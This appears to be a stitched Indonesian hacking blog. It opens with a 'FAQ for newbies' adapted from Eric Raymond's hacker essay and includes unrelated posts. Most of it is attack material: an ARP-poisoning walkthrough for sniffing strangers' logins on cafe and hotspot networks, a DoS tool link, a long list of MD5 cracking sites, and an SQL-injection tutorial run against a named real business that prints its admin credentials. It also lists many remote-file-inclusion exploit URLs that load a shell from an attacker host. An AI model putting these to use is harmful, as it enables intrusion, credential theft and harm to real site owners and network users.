F.A.Q for NEWBIES Version 1.0


http://ezine.echo.or...3dips-faqfn.txt

Author: y3dips || y3dips@echo.or.id
Online @ http://www.echo.or.id :: http://ezine.echo.or.id

==== F.A.Q for NEWBIES Version 1.0 ===

Intr0
-----

Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan micr*soft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com



ReFerensi :

[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting

*greetz to:
[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },

anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel

kirimkan kritik && saran ke y3dips[at]echo.or.id

Read more


Happy B'day Me Blog- 1 Years old

Tidak Kerasa nih blog udah berdiri ampe satu tahun banyak juga kisah dan duka nih gue diriin blog sampe sekarang ini.walau nih blog acak-acakkan ,kusam,dan kotor tapi alhamdulilah nih blog udah ngak ke rasa masih eksis sampe sekarang... :v :'(

And Bagi anda para pemula (newbie angkatan 2010-2011) <= awakakakaaaburrr . . Di dunia ini tidak ada ilmu yang sempurna , tidak ada master dan tidak ada juga newbie , semua sama masih perlu belajar ,... ada seorang master menguasai bidang tertentu , tapi si newbie tidak menguasai nya , dan sebaliknya ada seorang newbie menguasai bidang tertentu tapi si master tidak menguasainya..

So , Semua masih sama , share to share ....

Ketik ini aja w udah malas , gimana mau jadi blogger(ini aja ngopas punya umz Fee), hahaahaha..

I love Computer , Internet , Hacking , Scripting ..

Read more


Sniff password dengan cain dan abel [ LAN ]



Untuk proses installnya gak usah di ajarin ya.. ane anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang ane lakuin.
langsung aja buka cain + abelnya..
klik start / stop sniffer



Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini





pada mac address scan langsung klik OK saja
maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya



setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja.
Klik APR di tab bagian bawah, dan tampilan akan seperti ini



setelah itu klik tanda + warna biru untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini :




di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?]
masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya.
yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja.
Nah abis itu klik ok.
Abis langkah itu maka tampilannya seperti ini



Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning, seperti ini :




Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan
langsung saja masuk ke dalam password dengan klik tab password di bagian bawah




nah klik dibagian kiri HTTP, dan lihat hasilnya



Nah gimana ?? just simple kan ?

Read more


DOS attack + source


cekidot aja dah ....

DOS TECON-CREW
http://i49.tinypic.com/25k0bbq.jpg

program ini fungsinya untuk melakukan dos attack
feature :

-dos dengan socks 4 dan socks 5
-dos http
-dos dengan menggunakan proxy

downloadnya di sini download na di sini

http://www.4shared.com/file/frncc-eC/d0s.html


Nah silahkan dicoba, moga2 bsa nambah pengetahuan kita ...amin ^^

Read more


kumpulan md5 crackers online


http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&amppage=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&ampl=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.mil?rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&ampl=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://?p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://?p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…pproducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

Read more


tutorial sql injection dengan Simple SQLi Dumper v5.1tutorial sql injection dengan Simple SQLi Dumper v5.1



persiapan alat perang :

1.rokok
2.cemilan
3.bir
4.cwek untuk nambah semangat nginject :D

Langkah-Langkah Yang Mesti Benar2 Di Perhatikan

1.perl kalau di linux udh ada :D ..nah gmn kalau di windows download di sini "http://www.perl.org/get.html"
2.sqli dumper v.51 ... download di sini "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
trus extrack yang windows extrack di drive C kl linux taruh di folder my documentnya linux .... Pfft

ok udh siapkan sekarang mulai .......

target : http://www.beautycall.co.uk/gallery.php?id=1
dork :inurl:/gallery.php?id=

nah buka jendela terminal for linux ..dan .cmd for windows

step 1 "Find Magic Number / Null Column "-magic"
Command: perl ssdp.pl -u [URL] -magic

example"ketikkan perintah ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic


dan ini hasilnya .....
--------------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic


[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:22:10 2010
Help Command: -h, -help, --help

[+] URL: http://www.beautycall.co.uk/gallery.php?id=1
[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,

[+] Field Length : 3
[+] Magic Number : 2,3,
[+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3

Showing MySQL Information ...

[+] Database: beautycall_co_uk_web
[+] User: pmowat@localhost
[+] Version: 5.0.67
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": No

Done.

---------------------------------------------------------------------------------------
step 2
find the table
Concat Tables

Command: perl ssdp.pl -u [SQLi URL] -table

contoh ketikkan perintah ini :
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

ini hasilnya :

jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table


[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:24:59 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 40

Showing tables ...

[1] CITY(6)
[2] COUNTRY(32)
[3] admin(1)
[4] aplicationform(31)
[5] appointment(898)
[6] appointment_event(8)
[7] artist(96)
[8] artist_text_image(1)
[9] city(6)
[10] contact(1)
[11] efranchisee(122)
[12] files(2)
[13] files2(33)
[14] files3(0)
[15] folders(2)
[16] form(158)
[17] franchise(9)
[18] franchiseefolders(8)
[19] galery(20)
[20] homepage(1)
[21] links(26)
[22] links_cat(12)
[23] log(0)
[24] midlands(10)
[25] north(6)
[26] package_image(1)
[27] packages(5)
[28] postcode(122)
[29] regions(8)
[30] register(4)
[31] services(6)
[32] shortform(36)
[33] southeast(14)
[34] southwest(6)
[35] states(11)
[36] subfolders(14)
[37] ukmap(125)
[38] ukpostcodes(104)
[39] vouchers(1)
[40] wales(2)

Done.

--------------------------------------------------------------------------------
nah udh di dapatkan tablenya :D
nah lihat tuh table admin :D
sekarang kita ingin isi colomn admin tersebut .......

step 3
mencari colomn admin
Concat Columns
Required Options: -u, -t

Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
contoh ketikan command ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

hasilna seperti ini
---------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:38:30 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Number of Columns: 4

Showing columns from table "admin" ...

[+] admin(1): id,username,password,email

Done.

------------------------------------------------------------------------------------

nah itu ada isi colom admin id, username,password dan email ....wah keren yah ini tools Pfft
nah sekarang apa lagi ..


step end

dumping data

now we'll see information inside that column.. Smile

command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

contoh ketikkan perintah ini "
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump



hasilna
-------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump


[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:43:37 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --

[+] Database Name: database()
[+] Table Name: admin
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] beautycall2010 : d68553e40237bde1465a1da5b199c072

Done.

-----------------------------------------------------------------------------

akhirnya di dapatkan username dan password admin ...

username : beautycall2010
pass: d68553e40237bde1465a1da5b199c072


seee it simple ..and easy ....silahkan di coba ....

Read more


Game Nascar Rumble PC Geme


masih ingat ngak sama tuh game :) yups itu adalah game Ps One.kalau ngak salah dah lamu aku ngak mainin tuh game mungkin juga sahabat yang lain nya heheh
jadi ingat masa kecil dulu,kalau mainin tuh game suka ribut ngak karuan hahah
demi meinggatkan kita akan masa lalu akhir nya nih game ada versi Pc nya jd ngak mesti beli Ps One lagi heheh


Game Nascar Rumble For PC ini di request oleh salah satu sobat blogger, maaf yah kalau lama. Mungkin kedepan nya saya akan mencoba share game yang sudah direquest, seperti Dino Crisis, Digimon World, Suikoden, dll. Buat yang sudah request game tersebut, mohon kesabaran nya yah. Okeii

buat yang suka silakan klik Download Nascar Rumble Pc Game

Read more


Remote File Inclusion

Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:


include($my_ms[”root”].’/error.php’);

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:

http://www.target.com/[Script

Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

2. Setting dalam file PHP.ini

register_globals=On
magic_quotes=off
allow_fopenurl=on

CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :

http://target.com/Commence/includes/

db_connect.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

main_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

output_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/

user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/admin/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

page.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/includes/

include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase1.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase2.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase3.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phase4.php?privilege_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/reviewer/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase1.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase2.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase3.php?php_root_path=http://penyerang.com/shell.txt?

http://target.com/Commence/user/phase/

phase4.php?php_root_path=http://penyerang.com/shell.txt?

